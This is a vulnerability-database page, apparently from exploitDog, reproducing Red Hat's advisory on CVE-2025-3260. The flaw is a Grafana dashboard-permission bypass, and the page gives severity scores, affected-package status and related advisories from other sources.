Логотип exploitDog
Консоль
Логотип exploitDog

exploitDog

redhat логотип

CVE-2025-3260

Опубликовано: 25 апр. 2025
Источник: redhat
CVSS3: 8.5
EPSS Низкий

Описание

A security vulnerability in the /apis/dashboard.grafana.app/* endpoints allows authenticated users to bypass dashboard and folder permissions. The vulnerability affects all API versions (v0alpha1, v1alpha1, v2alpha1). Impact:

  • Viewers can view all dashboards/folders regardless of permissions
  • Editors can view/edit/delete all dashboards/folders regardless of permissions
  • Editors can create dashboards in any folder regardless of permissions
  • Anonymous users with viewer/editor roles are similarly affected Organization isolation boundaries remain intact. The vulnerability only affects dashboard access and does not grant access to datasources.

    A flaw was found in Grafana. This vulnerability allows users with Viewer or Editor roles to access or modify dashboards without proper permissions.

Отчет

This vulnerability is rated with an Important severity due to its ability to completely bypass role-based access controls, allowing users with VIEWER or EDITOR roles to access, modify, or delete dashboards regardless of permissions. The impact is further amplified when anonymous authentication is enabled, where unauthenticated users can perform privileged actions, significantly increasing exposure. Although organization-level isolation remains intact, the failure to enforce dashboard-level permissions undermines core security guarantees. It’s important to note that this issue affects only Grafana version 11.6.0, which is not included in any Red Hat supported builds, and therefore Red Hat customers are not impacted.

Меры по смягчению последствий

Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.

Затронутые пакеты

ПлатформаПакетСостояниеРекомендацияРелиз
Red Hat Enterprise Linux 10grafanaNot affected
Red Hat Enterprise Linux 8grafanaNot affected
Red Hat Enterprise Linux 9grafanaNot affected

Показывать по

Дополнительная информация

Статус:

Important
Дефект:
CWE-281
https://bugzilla.redhat.com/show_bug.cgi?id=2358556grafana: Unauthorized Dashboard Access in Grafana

EPSS

Процентиль: 1%
0.00013
Низкий

8.5 High

CVSS3

Связанные уязвимости

CVSS3: 8.3
ubuntu
2 месяца назад

A security vulnerability in the /apis/dashboard.grafana.app/* endpoints allows authenticated users to bypass dashboard and folder permissions. The vulnerability affects all API versions (v0alpha1, v1alpha1, v2alpha1). Impact: - Viewers can view all dashboards/folders regardless of permissions - Editors can view/edit/delete all dashboards/folders regardless of permissions - Editors can create dashboards in any folder regardless of permissions - Anonymous users with viewer/editor roles are similarly affected Organization isolation boundaries remain intact. The vulnerability only affects dashboard access and does not grant access to datasources.

CVSS3: 8.3
nvd
2 месяца назад

A security vulnerability in the /apis/dashboard.grafana.app/* endpoints allows authenticated users to bypass dashboard and folder permissions. The vulnerability affects all API versions (v0alpha1, v1alpha1, v2alpha1). Impact: - Viewers can view all dashboards/folders regardless of permissions - Editors can view/edit/delete all dashboards/folders regardless of permissions - Editors can create dashboards in any folder regardless of permissions - Anonymous users with viewer/editor roles are similarly affected Organization isolation boundaries remain intact. The vulnerability only affects dashboard access and does not grant access to datasources.

CVSS3: 8.3
debian
2 месяца назад

A security vulnerability in the /apis/dashboard.grafana.app/* endpoint ...

CVSS3: 8.3
github
2 месяца назад

Grafana vulnerable to authenticated users bypassing dashboard, folder permissions

CVSS3: 8.3
fstec
2 месяца назад

Уязвимость платформы для мониторинга и наблюдения Grafana, связанная с недостатками механизма авторизации, позволяющая нарушителю обойти существующие ограничения безопасности

EPSS

Процентиль: 1%
0.00013
Низкий

8.5 High

CVSS3